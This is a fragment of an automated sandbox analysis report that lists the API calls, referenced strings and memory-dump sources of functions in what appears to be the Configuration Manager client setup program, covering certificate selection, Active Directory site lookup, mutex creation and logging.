                                                                                          • LSPerformADQuery( spCont, spSearch, hSearch, pszRoamingBdryAttr, dwRoamingBdryAttrCount, sRangeSearchFilter ), xrefs: 006426D4
                                                                                          • ..\lsad.cpp, xrefs: 00642E14
                                                                                          • spSearch->GetColumn(hSearch, L"mSSMSAssignmentSiteCode", &col), xrefs: 00642BB5
                                                                                          • ..\lsad.cpp, xrefs: 0064283F
                                                                                          • CCM::LocationServices::LSGetAssignedSiteFromAD, xrefs: 0064237E
                                                                                          • LSBuildSiteCodeSearchFilter(vecBoundaries, sSiteCodeVector, sSubnetSearchFilter), xrefs: 00642977
                                                                                          • ..\lsad.cpp, xrefs: 00642C58
                                                                                          • ..\lsad.cpp, xrefs: 00642989
                                                                                          • ..\lsad.cpp, xrefs: 00642971
                                                                                          • The client will be assigned to the first valid site, xrefs: 00642DD6
                                                                                          • hr = spSearch->GetFirstRow(hSearch), xrefs: 00642737
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00642D0D
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006428FD
                                                                                          • ..\lsad.cpp, xrefs: 00642A02
                                                                                          • ..\lsad.cpp, xrefs: 00642BAF
                                                                                          • ..\lsad.cpp, xrefs: 006424E7
                                                                                          • ..\lsad.cpp, xrefs: 0064274D
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006424F2
                                                                                          • col.dwNumValues >= 1, xrefs: 00642C06
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0064245A
                                                                                          • ..\lsad.cpp, xrefs: 006428C9
                                                                                          • ..\lsad.cpp, xrefs: 00642C70
                                                                                          • LSBuildRangeSiteCodeSearchFilter(vecBoundaries, sRangeSearchFilter), xrefs: 00642601
                                                                                          • mSSMSAssignmentSiteCode, xrefs: 00642B7B
                                                                                          • Failed to build site code search filter, xrefs: 0064263B
                                                                                          • ..\lsad.cpp, xrefs: 00642613
                                                                                          • ..\lsad.cpp, xrefs: 0064290E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006425A6
                                                                                          • Failed to build site code search filter, xrefs: 006429B1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00642A63
                                                                                          • sSubnetSearchFilter.length(), xrefs: 006429EC
                                                                                          • ..\lsad.cpp, xrefs: 00642A70
                                                                                          • ..\lsad.cpp, xrefs: 006429E6
                                                                                          • hr = spSearch->GetFirstRow(hSearch), xrefs: 00642AB8
                                                                                          • ..\lsad.cpp, xrefs: 0064244F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00642C63
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00642ABD
                                                                                          • Failed to get subnet boundaries, xrefs: 0064248F
                                                                                          • distinguishedName, xrefs: 006422E0
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00642B0A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$H_prolog3H_prolog3_catch$TextUnicode
                                                                                          • API String ID: 3257228284-3649645874

                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0062303E
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006230F5
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00623159
                                                                                          • CertOpenStore.CRYPT32(0000000A,00000000,00000000,0002C000,?), ref: 0062325B
                                                                                          • GetLastError.KERNEL32(?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000,?), ref: 0062326F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006232A5
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062333C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062346F
                                                                                          • CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 00623526
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062356E
                                                                                          • CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 00623659
                                                                                          • GetLastError.KERNEL32(?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000,?), ref: 0062366B
                                                                                          • CertFreeCertificateContext.CRYPT32(00000000,00000000,?,?,00000000,?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000), ref: 006236D2
                                                                                          • GetLastError.KERNEL32(?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000,?), ref: 006236DC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00623716
                                                                                            • Part of subcall function 006227C0: __EH_prolog3_catch.LIBCMT ref: 006227C7
                                                                                            • Part of subcall function 006227C0: GetCurrentThreadId.KERNEL32 ref: 00622815
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00623870
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006238BB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006236A5
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                            • Part of subcall function 006258C2: __EH_prolog3_catch_GS.LIBCMT ref: 006258CC
                                                                                            • Part of subcall function 006258C2: GetCurrentThreadId.KERNEL32 ref: 0062595A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00623811
                                                                                          • CertDuplicateCertificateContext.CRYPT32(?), ref: 00623917
                                                                                          • GetLastError.KERNEL32(?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000,?), ref: 00623929
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00623963
                                                                                          • CertFreeCertificateContext.CRYPT32(?,?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000), ref: 00623976
                                                                                          • GetLastError.KERNEL32(?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000,?), ref: 00623980
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006239BA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00623A01
                                                                                          • CertCloseStore.CRYPT32(?,00000000), ref: 00623A5B
                                                                                          • CertCloseStore.CRYPT32(?,00000000), ref: 00623A69
                                                                                            • Part of subcall function 005A0C32: __EH_prolog3_GS.LIBCMT ref: 005A0C39
                                                                                          Strings
                                                                                          • CcmGetCertSubjectNameAny(pCurCertContext, sCertSubjectName), xrefs: 00623866
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006230F0
                                                                                          • %lu certificate(s) found in the '%s' certificate store., xrefs: 00623603
                                                                                          • ..\CcmCert.cpp, xrefs: 0062396B
                                                                                          • Certificate Selection Criteria, xrefs: 00623503
                                                                                          • NULL != hStore, xrefs: 0062329B
                                                                                          • Failed to open '%s' certificate store., xrefs: 006232E1
                                                                                          • 0 != ppCertContext, xrefs: 0062314F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00623337
                                                                                          • 0 != pCurCertContext, xrefs: 0062369B
                                                                                          • Only one certificate present in the certificate store., xrefs: 00623644
                                                                                          • ..\CcmCert.cpp, xrefs: 00623165
                                                                                          • The '%s' was not specified, counting number of certificates present in '%s' store of 'Local Computer'., xrefs: 00623508
                                                                                          • CcmGetCertThumbprint(pCurCertContext, sCertThumbprint), xrefs: 006238B1
                                                                                          • ..\CcmCert.cpp, xrefs: 006230E5
                                                                                          • GetCertificateBySelectionCriteriaEx( hChainEngine, hFilteredStore, sCertSel, bCertFirstFlag, dwCertFlags, &pCurCertContext ), xrefs: 00623465
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062346A
                                                                                          • 0 != *ppCertContext, xrefs: 006239F7
                                                                                          • The '%s' of 'Local Computer' store has %lu certificate(s). Using custom selection criteria based on the machine name., xrefs: 0062375E
                                                                                          • >>> Client selected the PKI Certificate [Thumbprint %s] issued to '%s', xrefs: 00623905
                                                                                          • ..\CcmCert.cpp, xrefs: 00623953
                                                                                          • ..\CcmCert.cpp, xrefs: 0062332C
                                                                                          • ,,|, xrefs: 006237A6
                                                                                          • ..\CcmCert.cpp, xrefs: 0062345F
                                                                                          • ..\CcmCert.cpp, xrefs: 00623344
                                                                                          • ::CertFreeCertificateContext( pCurCertContext ), xrefs: 0062370C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062395E
                                                                                          • ..\CcmCert.cpp, xrefs: 00623801
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006236A0
                                                                                          • ..\CcmCert.cpp, xrefs: 00623477
                                                                                          • ..\CcmCert.cpp, xrefs: 006238C3
                                                                                          • ..\CcmCert.cpp, xrefs: 006239AA
                                                                                          • ..\CcmCert.cpp, xrefs: 00623149
                                                                                          • ..\CcmCert.cpp, xrefs: 0062371E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00623569
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006239FC
                                                                                          • ..\CcmCert.cpp, xrefs: 006239C2
                                                                                          • ..\CcmCert.cpp, xrefs: 006232AD
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00623154
                                                                                          • There are no certificates in the '%s' store., xrefs: 006235B9
                                                                                          • ..\CcmCert.cpp, xrefs: 00623878
                                                                                          • ..\CcmCert.cpp, xrefs: 0062355E
                                                                                          • 0 != dwCertCount, xrefs: 00623564
                                                                                          • User\, xrefs: 0062316E, 0062317B
                                                                                          • Machine\, xrefs: 006231DA, 006231E7
                                                                                          • ..\CcmCert.cpp, xrefs: 00623695
                                                                                          • `|, xrefs: 006234A0
                                                                                          • ::CertFreeCertificateContext(pCurCertContext), xrefs: 006239B0
                                                                                          • CcmGetFilteredCertificateStoreByIssuers(hStore, sCertIssuers, hFilteredStore, bFoundCerts), xrefs: 00623332
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00623711
                                                                                          • CcmUtilLib::CcmGetCertificateContextEx3, xrefs: 006230AA
                                                                                          • sCertStoreName.length() > 0, xrefs: 006230EB
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006232A0
                                                                                          • ..\CcmCert.cpp, xrefs: 00623576
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006239B5
                                                                                          • 0 != *ppCertContext, xrefs: 00623959
                                                                                          • ..\CcmCert.cpp, xrefs: 006239F1
                                                                                          • ..\CcmCert.cpp, xrefs: 006236AD
                                                                                          • Begin to select client certificate, xrefs: 006233B3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062386B
                                                                                          • Unable to find any Certificate based on Certificate Issuers, xrefs: 006234B4
                                                                                          • Using certificate selection criteria '%s'., xrefs: 00623409
                                                                                          • ..\CcmCert.cpp, xrefs: 00623101
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006238B6
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062380C
                                                                                          • ..\CcmCert.cpp, xrefs: 00623860
                                                                                          • ..\CcmCert.cpp, xrefs: 006238AB
                                                                                          • (|, xrefs: 0062339F
                                                                                          • ..\CcmCert.cpp, xrefs: 00623295
                                                                                          • ..\CcmCert.cpp, xrefs: 00623A09
                                                                                          • ..\CcmCert.cpp, xrefs: 00623706
                                                                                          • Using custom selection criteria based on the machine NetBIOS name., xrefs: 006237BA
                                                                                          • ..\CcmCert.cpp, xrefs: 00623819
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Cert$ErrorLastStore$CertificateContext$CertificatesCloseEnumFreeH_prolog3_catch_$DuplicateH_prolog3H_prolog3_H_prolog3_catchOpen

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0058C6E5
                                                                                            • Part of subcall function 005FB1B1: __EH_prolog3_catch_GS.LIBCMT ref: 005FB1BB
                                                                                            • Part of subcall function 005FB1B1: ExpandEnvironmentStringsW.KERNEL32(%SystemRoot%\ccmsetup\ccmsetup.exe,?,00000104,CCM::Utility::GetCcmSetupDirectory), ref: 005FB218
                                                                                            • Part of subcall function 005FB1B1: GetLastError.KERNEL32 ref: 005FB226
                                                                                            • Part of subcall function 005FB1B1: GetCurrentThreadId.KERNEL32 ref: 005FB25F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C747
                                                                                            • Part of subcall function 005A1D30: __EH_prolog3_catch_GS.LIBCMT ref: 005A1D3A
                                                                                            • Part of subcall function 005A1D30: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,?,?,CSetupEnvironment::Initialize), ref: 005A1DDC
                                                                                            • Part of subcall function 005A1D30: GetLastError.KERNEL32 ref: 005A1DE6
                                                                                            • Part of subcall function 005A1D30: GetCurrentThreadId.KERNEL32 ref: 005A1E1B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C7A8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C7E9
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C853
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C8B8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C905
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C977
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C9FE
                                                                                          • CreateMutexW.KERNEL32(00000000,00000000,Global\CcmsetupMutex,O:BAG:BAD:(A;;GA;;;BA)(A;;GA;;;SY),00000000,?,?,?,?,?,?,?,00000001,00000000,00000000,?), ref: 0058CBCB
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000001,00000000,00000000,?,?,ccmsetup.dat,00000001,032FCCBC,00000001), ref: 0058CBEA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058CC20
                                                                                            • Part of subcall function 0060052A: __EH_prolog3_catch.LIBCMT ref: 00600531
                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,Global\CcmsetupServiceEvent,O:BAG:BAD:(A;;GA;;;BA)(A;;GA;;;SY),00000000,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 0058CC79
                                                                                            • Part of subcall function 0057819C: CloseHandle.KERNEL32 ref: 005781AB
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000001,00000000,00000000,?,?,ccmsetup.dat,00000001,032FCCBC,00000001), ref: 0058CC99
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058CCCF
                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,00000001,00000000,00000000,?,?), ref: 0058CD11
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000001,00000000,00000000,?,?,ccmsetup.dat,00000001,032FCCBC,00000001), ref: 0058CD24
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058CD5A
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C7E4
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C84E
                                                                                          • ccmsetup.cpp, xrefs: 0058CD62
                                                                                          • ccmsetup.dat, xrefs: 0058CAFD
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C8B3
                                                                                          • Failed to create ccmsetup mutex (0x%x), xrefs: 0058CC49
                                                                                          • ccmsetup.cpp, xrefs: 0058CC10
                                                                                          • ccmsetup.cpp, xrefs: 0058C8C0
                                                                                          • InitializeLogging(), xrefs: 0058C7DF
                                                                                          • ccmsetup.cpp, xrefs: 0058C9EE
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058CCCA
                                                                                          • SetObjectSecurity(m_sCacheDir.c_str(), c_szDownloadDirectorySecurity), xrefs: 0058C9F4
                                                                                          • ccmsetup.cpp, xrefs: 0058CD4A
                                                                                          • g_pSetupEnv->Initialize(), xrefs: 0058C8AE
                                                                                          • ccmsetup.cpp, xrefs: 0058CA06
                                                                                          • ccmsetup.cpp, xrefs: 0058C737
                                                                                          • ccmsetup.cpp, xrefs: 0058C7D9
                                                                                          • Failed to create ccmsetup running event (0x%x), xrefs: 0058CD83
                                                                                          • ccmsetup.cpp, xrefs: 0058CC28
                                                                                          • CreateDownloadDirectory(), xrefs: 0058C79E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058CC1B
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058CD55
                                                                                          • m_shRunningEvent.null() == false, xrefs: 0058CD50
                                                                                          • ccmsetup.cpp, xrefs: 0058C7B0
                                                                                          • ccmsetup.cpp, xrefs: 0058C843
                                                                                          • ccmsetup.cpp, xrefs: 0058C74F
                                                                                          • ccmsetup.cpp, xrefs: 0058C967
                                                                                          • Global\CcmsetupMutex, xrefs: 0058CBC3
                                                                                          • ccmsetup.cpp, xrefs: 0058C90D
                                                                                          • CcmSetup version: %s, xrefs: 0058CAAC
                                                                                          • ccmsetup.cpp, xrefs: 0058C7F1
                                                                                          • GetCcmSetupCacheDirectory(m_sCacheDir), xrefs: 0058C8FB
                                                                                          • ccmsetup.cpp, xrefs: 0058C85B
                                                                                          • O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY), xrefs: 0058C93D, 0058C9C2
                                                                                          • O:BAG:BAD:(A;;GA;;;BA)(A;;GA;;;SY), xrefs: 0058CBAC, 0058CC58
                                                                                          • CcmSetup::Initialize, xrefs: 0058C6F3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C900
                                                                                          • Filesystem::Path::CreateEx(m_sCacheDir.c_str(), c_szDownloadDirectorySecurity), xrefs: 0058C96D
                                                                                          • ccmsetup.cpp, xrefs: 0058C8F5
                                                                                          • m_shCcmsetupServiceEvent.null() == false, xrefs: 0058CCC5
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C9F9
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C972
                                                                                          • ccmsetup.cpp, xrefs: 0058C798
                                                                                          • Initialization failed with error 0x%x, xrefs: 0058CDE7
                                                                                          • (g_pSetupEnv = new CSetupEnvironment()) != 0, xrefs: 0058C849
                                                                                          • ccmsetup.cpp, xrefs: 0058C97F
                                                                                          • lj, xrefs: 0058CDD8
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C742
                                                                                          • ccmsetup.cpp, xrefs: 0058CCD7
                                                                                          • m_shCcmsetupMutex.null() == false, xrefs: 0058CC16
                                                                                          • ccmsetup.cpp, xrefs: 0058CCBF
                                                                                          • ccmsetup.cpp, xrefs: 0058C8A8
                                                                                          • Failed to create cache folder with error 0x%x, xrefs: 0058C9A0
                                                                                          • GetCcmSetupDirectory(false, m_sDownloadDir), xrefs: 0058C73D
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C7A3
                                                                                          • Launch from folder %s, xrefs: 0058CA43
                                                                                          • Global\CcmsetupServiceEvent, xrefs: 0058CC6F
                                                                                          • Failed to create ccmsetup service event (0x%x), xrefs: 0058CCF8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$ErrorLast$CreateH_prolog3_catch_$Event$CloseEnvironmentExpandFileH_prolog3_catchHandleModuleMutexNameStrings

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005F1A08
                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 005F1B50
                                                                                          • GetLastError.KERNEL32 ref: 005F1B60
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F1B9C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F1C01
                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000200,00000000,00000000), ref: 005F1C4B
                                                                                          • EnterCriticalSection.KERNEL32(00000004), ref: 005F1C59
                                                                                          • LockFileEx.KERNEL32(000000FF,00000002,00000000,00000001,00000000,?), ref: 005F1CAA
                                                                                          • CreateFileW.KERNEL32(?,80000006,00000003,00000000,00000004,00000080,00000000), ref: 005F1CE5
                                                                                          • GetLastError.KERNEL32 ref: 005F1D00
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F1D38
                                                                                          • GetFileType.KERNEL32(000000FF), ref: 005F1D61
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F1D95
                                                                                          • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002), ref: 005F1DB2
                                                                                          • WriteFile.KERNEL32(000000FF,0092F200,00000003,?,00000000), ref: 005F1DD5
                                                                                          • GetLastError.KERNEL32 ref: 005F1DE3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F1E1F
                                                                                          • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002), ref: 005F1E60
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F1EB4
                                                                                          • UnlockFileEx.KERNEL32(000000FF,00000000,00000001,00000000,?), ref: 005F20E5
                                                                                          • LeaveCriticalSection.KERNEL32(00000002), ref: 005F20FC
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000200), ref: 005F215F
                                                                                          Strings
                                                                                          • uAnsiLength > 0, xrefs: 005F1B92
                                                                                          • ..\Logging.cpp, xrefs: 005F1F72
                                                                                          • WriteFile( shLogFile, (LPVOID)UTF8_BOM, (sizeof(UTF8_BOM)/sizeof(UTF8_BOM[0])), &dwWritten, 0 ), xrefs: 005F1E15
                                                                                          • ..\Logging.cpp, xrefs: 005F1F8E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F1D90
                                                                                          • GetFileType(shLogFile) == 0x0001, xrefs: 005F1D8B
                                                                                          • ..\Logging.cpp, xrefs: 005F1D85
                                                                                          • SetFilePointer(shLogFile, 0, 0, 0) != ((DWORD)-1), xrefs: 005F1F19
                                                                                          • ..\Logging.cpp, xrefs: 005F1BF1
                                                                                          • (szAnsiBuffer.resize(uAnsiLength) == true) != 0, xrefs: 005F1BF7
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F1BFC
                                                                                          • ..\Logging.cpp, xrefs: 005F1EA4
                                                                                          • WriteFile( shLogFile, szAnsiBuffer.size() == 0 ? (LPVOID)szAnsiBuf : (LPVOID)szAnsiBuffer.getBuffer(), uAnsiLength - sizeof(CHAR),, xrefs: 005F2070
                                                                                          • shLogFile.null() == false, xrefs: 005F1D2E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F2075
                                                                                          • WriteFile( shLogFile, (LPVOID)UTF8_BOM, (sizeof(UTF8_BOM)/sizeof(UTF8_BOM[0])), &dwWritten, 0 ), xrefs: 005F1FE9
                                                                                          • ..\Logging.cpp, xrefs: 005F1FE3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F1D33
                                                                                          • RolloverLogFile( shLogFile, pszLogFile, uLogMaxHistory ), xrefs: 005F1EAA
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F1EAF
                                                                                          • ..\Logging.cpp, xrefs: 005F1D44
                                                                                          • ..\Logging.cpp, xrefs: 005F1E0F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F1E1A
                                                                                          • ..\Logging.cpp, xrefs: 005F1F2F
                                                                                          • ..\Logging.cpp, xrefs: 005F1FFF
                                                                                          • ..\Logging.cpp, xrefs: 005F1D28
                                                                                          • ..\Logging.cpp, xrefs: 005F1BA8
                                                                                          • ..\Logging.cpp, xrefs: 005F1B8C
                                                                                          • ..\Logging.cpp, xrefs: 005F1C0D
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F1FEE
                                                                                          • `)l, xrefs: 005F2140
                                                                                          • ..\Logging.cpp, xrefs: 005F206A
                                                                                          • ..\Logging.cpp, xrefs: 005F1F13
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F1F7D
                                                                                          • ..\Logging.cpp, xrefs: 005F1DA1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F1B97
                                                                                          • ..\Logging.cpp, xrefs: 005F1E2B
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F1F1E
                                                                                          • ..\Logging.cpp, xrefs: 005F2086
                                                                                          • SetEndOfFile(shLogFile), xrefs: 005F1F78
                                                                                          • ..\Logging.cpp, xrefs: 005F1EC0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$CurrentThread$ErrorLast$ByteCharCriticalMultiPointerSectionWide$CloseCreateEnterH_prolog3_catch_HandleLeaveLockTypeUnlockWrite

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005B2927
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 005B14FC: __EH_prolog3.LIBCMT ref: 005B1503
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00603360: __EH_prolog3_catch_GS.LIBCMT ref: 00603367
                                                                                            • Part of subcall function 00603360: GetCurrentThreadId.KERNEL32 ref: 006033F8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B2A0C
                                                                                            • Part of subcall function 0060C143: __EH_prolog3_catch.LIBCMT ref: 0060C14A
                                                                                            • Part of subcall function 0060C143: GetCurrentThreadId.KERNEL32 ref: 0060C1A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B2A90
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B2AEA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B2B67
                                                                                            • Part of subcall function 0060BC69: __EH_prolog3_catch.LIBCMT ref: 0060BC70
                                                                                            • Part of subcall function 0060BC69: GetCurrentThreadId.KERNEL32 ref: 0060BCCC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B2BC5
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B2C26
